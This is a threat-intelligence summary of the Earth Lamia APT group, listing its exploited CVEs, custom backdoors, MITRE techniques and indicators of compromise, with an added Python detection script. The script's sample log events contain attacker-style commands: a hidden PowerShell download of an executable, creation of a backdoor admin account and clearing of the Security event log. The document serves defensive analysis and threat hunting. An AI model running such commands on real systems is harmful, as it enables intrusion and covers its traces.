Earth Lamia Develops Custom Arsenal to Target Multiple Industries

Earth Lamia is an active China-nexus APT group that has been exploiting web application vulnerabilities since 2023 to compromise organizations, primarily in Brazil, India, and Southeast Asia. It relies on customized hacking tools and backdoors such as PULSEPACK and BypassBoss, and has shifted its targeting across industries from financial services to IT companies, universities, and government entities.

Keypoints

  • Earth Lamia exploits SQL injection flaws and multiple CVEs (e.g., CVE-2017-9805 in the Apache Struts 2 REST plugin and CVE-2025-31324 in SAP NetWeaver Visual Composer) to gain access to public-facing servers and SQL databases.
  • The group customizes open-source hacking tools and employs DLL sideloading techniques to evade detection, using tools such as “BypassBoss” and loaders for Cobalt Strike and Brute Ratel.
  • They developed the modular .NET backdoor PULSEPACK, which evolved to use WebSocket communication and dynamically loads plugins from the C2 server.
  • Targets have shifted over time from financial services to logistics, online retail, and most recently IT companies, universities, and government organizations mainly in Brazil, India, and Southeast Asia.
  • Post-exploitation activity includes privilege escalation (using GodPotato and JuicyPotato), creating administrative accounts, network scanning, credential dumping, and lateral movement that deploys backdoors such as VShell and Cobalt Strike on further hosts.
  • Earth Lamia’s infrastructure and tactics overlap with intrusion sets REF0657 and activities linked to campaigns STAC6451 and CL-STA-0048, though the group has not been observed deploying ransomware.
  • Trend Vision One™ detects and blocks Earth Lamia IOCs and provides hunting queries, threat insights, and intelligence reports to enhance organizational defense.

MITRE Techniques

  • [T1595.001] Active Scanning: Scanning IP Blocks – Earth Lamia conducts vulnerability scans on targets’ websites (‘frequently conducted vulnerability scans to identify possible SQL injection vulnerabilities’).
  • [T1595.002] Active Scanning: Vulnerability Scanning – The actor scans for vulnerabilities in public-facing servers (exploiting CVE-2017-9805, CVE-2021-22205, and others).
  • [T1592] Gather Victim Host Information – Plugins collect system version, usernames, and antivirus software info (‘collects the information of the infected machine’).
  • [T1583.001] Acquire Infrastructure: Domains – Uses domains like “chrome-online[.]site” for C2 infrastructure (‘Cobalt Strike sample connects to “chrome-online[.]site”’).
  • [T1190] Exploit Public-Facing Application – Uses SQL injection and exploits multiple vulnerabilities to gain initial access (‘primarily targets the SQL injection vulnerabilities on web applications’).
  • [T1078] Valid Accounts – Creates accounts such as “sysadmin123” on SQL servers with administrator privileges (‘CREATE LOGIN sysadmin123 WITH PASSWORD …’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell for downloading tools and execution (‘Using “powershell.exe” to download additional tools’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Executes commands via “cmd.exe” subprocesses for backdoor control (‘the backdoor process can create a subprocess called “cmd.exe”’).
  • [T1098.007] Account Manipulation: Additional Local or Domain Groups – Adds created accounts to local administrators (‘adding it to the administrators’ local group’).
  • [T1136.001] Create Account: Local Account – Creates new local user accounts like “helpdesk”.
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Uses scheduled tasks for persistence (‘creates a scheduled task to launch the executable after a system reboot’).
  • [T1505.003] Server Software Component: Web Shell – Deploys webshells to website applications (‘Deploying webshells to website applications’).
  • [T1068] Exploitation for Privilege Escalation – Uses exploits like GodPotato and JuicyPotato for privilege escalation.
  • [T1078.003] Valid Accounts: Local Accounts – Uses local accounts for defense evasion and persistence.
  • [T1140] Deobfuscate/Decode Files or Information – Deobfuscates RC4 and AES encrypted shellcode payloads (‘uses RC4 encryption to protect the malicious shellcode’).
  • [T1574.001] Hijack Execution Flow: DLL Sideloading – Employs DLL sideloading to launch malicious DLLs via legitimate executables (‘packages hacking tools into DLL files launched via DLL sideloading’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Strips or obfuscates the static strings in its tools so that signature-based detections no longer match them.
  • [T1070.001] Indicator Removal: Clear Windows Event Logs – Cleans event logs using “wevtutil.exe”.
  • [T1036.005] Masquerading: Match Legitimate Resource Name or Location – Uses legitimate binaries from security vendors for sideloading.
  • [T1620] Reflective Code Loading – Loads plugins and backdoor components in memory using “Assembly.Load”.
  • [T1003.001] OS Credential Dumping: LSASS Memory – Dumps credentials from LSASS memory.
  • [T1003.002] OS Credential Dumping: Security Account Manager – Extracts SAM and SYSTEM hives for credentials.
  • [T1087.001] Account Discovery: Local Account – Enumerates local accounts on compromised hosts.
  • [T1087.002] Account Discovery: Domain Account – Discovers domain accounts.
  • [T1482] Domain Trust Discovery – Collects domain controller info (‘Collecting domain controller information with “nltest.exe” and “net.exe”’).
  • [T1570] Lateral Tool Transfer – Transfers tools laterally inside the network.
  • [T1005] Data from Local System – Collects data locally on compromised systems.
  • [T1132.001] Data Encoding: Standard Encoding – Uses Base64 encoding for plugin delivery.
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – Uses AES encryption for communication and plugin payloads.
  • [T1008] Fallback Channels – Uses fallback C2 communication methods.
  • [T1105] Ingress Tool Transfer – Downloads tools onto compromised hosts.
  • [T1104] Multi-Stage Channels – Utilizes multi-stage plugin loading from C2.
  • [T1095] Non-Application Layer Protocol – Earlier PULSEPACK versions communicated with the C2 over a raw TCP socket; the later version switched to WebSocket, which rides on HTTP and therefore falls under application-layer protocols (T1071.001) rather than this technique.
  • [T1571] Non-Standard Port – Uses non-standard TCP ports for C2.
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates victim data over command and control channels.
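The techniques above describe a recognizable post-exploitation chain: a SQL Server process spawning a shell (xp_cmdshell after SQL injection), a fresh local account being added to the administrators group, and event-log clearing with wevtutil.exe. The hunting logic below is an added example, not Trend Micro's code or detection content. It runs over constructed log records (Python dicts standing in for Windows Security events 4688, 4720, 4732 and 1102, reduced to the fields the rules need) and flags those three behaviours. Hostnames, user names, timestamps and the 198.51.100.7 address are made up.

```python
"""Hunt for the Earth Lamia-style chain: SQL Server -> shell, new local admin, log clearing.

Added example; the log records are constructed, not real telemetry.
"""
from __future__ import annotations

from dataclasses import dataclass

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DB_PARENTS = {"sqlservr.exe"}   # xp_cmdshell abuse shows up as sqlservr.exe -> cmd.exe
ADMIN_WINDOW = 3600             # seconds allowed between account creation and the group add


@dataclass(frozen=True)
class Finding:
    host: str
    ts: int
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\x\\cmd.exe' -> 'cmd.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def db_spawned_shell(ev: dict) -> Finding | None:
    """4688: sqlservr.exe launching a shell, the footprint of xp_cmdshell after SQLi."""
    if ev.get("event_id") != 4688:
        return None
    if basename(ev.get("parent_image", "")) in DB_PARENTS and basename(ev.get("image", "")) in SHELLS:
        return Finding(ev["host"], ev["ts"], "db_spawned_shell", ev.get("command_line", ""))
    return None


def log_cleared(ev: dict) -> Finding | None:
    """1102 (audit log cleared) or a 4688 for 'wevtutil cl <log>'."""
    if ev.get("event_id") == 1102:
        return Finding(ev["host"], ev["ts"], "event_log_cleared", "audit log cleared (1102)")
    if ev.get("event_id") == 4688 and basename(ev.get("image", "")) == "wevtutil.exe":
        args = ev.get("command_line", "").lower().split()
        if "cl" in args or "clear-log" in args:
            return Finding(ev["host"], ev["ts"], "event_log_cleared", ev["command_line"])
    return None


def new_admin_accounts(events: list[dict]) -> list[Finding]:
    """Pair a 4720 (account created) with a later 4732 that adds the same account to
    Administrators on the same host within ADMIN_WINDOW seconds. Real 4732 events carry
    the member as a SID; the constructed sample uses the plain name for simplicity."""
    created: dict[tuple[str, str], int] = {}
    findings: list[Finding] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev.get("event_id") == 4720:
            created[(ev["host"], ev["target_user"].lower())] = ev["ts"]
        elif ev.get("event_id") == 4732 and ev.get("group", "").lower() == "administrators":
            key = (ev["host"], ev.get("member", "").lower())
            if key in created and 0 <= ev["ts"] - created[key] <= ADMIN_WINDOW:
                findings.append(Finding(ev["host"], ev["ts"], "new_account_to_admins", key[1]))
    return findings


def hunt(events: list[dict]) -> list[Finding]:
    """Apply all rules and return findings ordered by time."""
    findings = [f for ev in events for f in (db_spawned_shell(ev), log_cleared(ev)) if f]
    findings.extend(new_admin_accounts(events))
    return sorted(findings, key=lambda f: (f.ts, f.rule))


# Constructed sample: one compromised host (web01) and one benign admin action (app02).
SQLSERVR = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"
SAMPLE_EVENTS = [
    {"host": "web01", "ts": 100, "event_id": 4688, "parent_image": SQLSERVR,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c powershell.exe -nop -w hidden -c \"IWR http://198.51.100.7/a.exe -OutFile C:\\Users\\Public\\a.exe\""},
    {"host": "web01", "ts": 105, "event_id": 4688, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\net.exe", "command_line": "net user helpdesk P@ssw0rd! /add"},
    {"host": "web01", "ts": 106, "event_id": 4720, "target_user": "helpdesk"},
    {"host": "web01", "ts": 110, "event_id": 4732, "group": "Administrators", "member": "helpdesk"},
    {"host": "web01", "ts": 900, "event_id": 4688, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wevtutil.exe", "command_line": "wevtutil.exe cl Security"},
    # Benign: an operator creates a service account; the group add comes hours later.
    {"host": "app02", "ts": 200, "event_id": 4688, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe"},
    {"host": "app02", "ts": 201, "event_id": 4720, "target_user": "svc_backup"},
    {"host": "app02", "ts": 50000, "event_id": 4732, "group": "Administrators", "member": "svc_backup"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Running the block prints three findings, all on web01: the SQL Server-spawned shell, the helpdesk account added to Administrators four seconds after creation, and the wevtutil.exe log clear. The app02 group add is not flagged because it falls outside ADMIN_WINDOW; tune that window and the SHELLS set to the environment before deploying a rule like this.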

Indicators of Compromise

  • [IP Address] Earth Lamia infrastructure and C2 servers – 43.247.135[.]53, 103.30.76[.]206 (used for Cobalt Strike C2 and exploitation).
  • [Domain] Command and Control domains – chrome-online[.]site (Cobalt Strike C2 domain linked to REF0657 / Earth Lamia), sentinelones[.]com (C2 domain associated with related campaigns).
  • [File Hash] Malware samples – SHA256 1d0b246f8d43442ea0eaecde5cfa7fcd8139a9ba93496cd82a8ac056f7393bcf (mscoree.dll malicious loader), SHA256 bb6ab67ddbb74e7afb82bb063744a91f3fecf5fd0f453a179c0776727f6870c7 (VShell sample).
  • [File Name] Malware and tool names – AppLaunch.exe (legitimate binary used for DLL sideloading), Sophosx64.exe (GodPotato privilege escalation tool), USERENV.dll (Cobalt Strike loader).


Read more: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html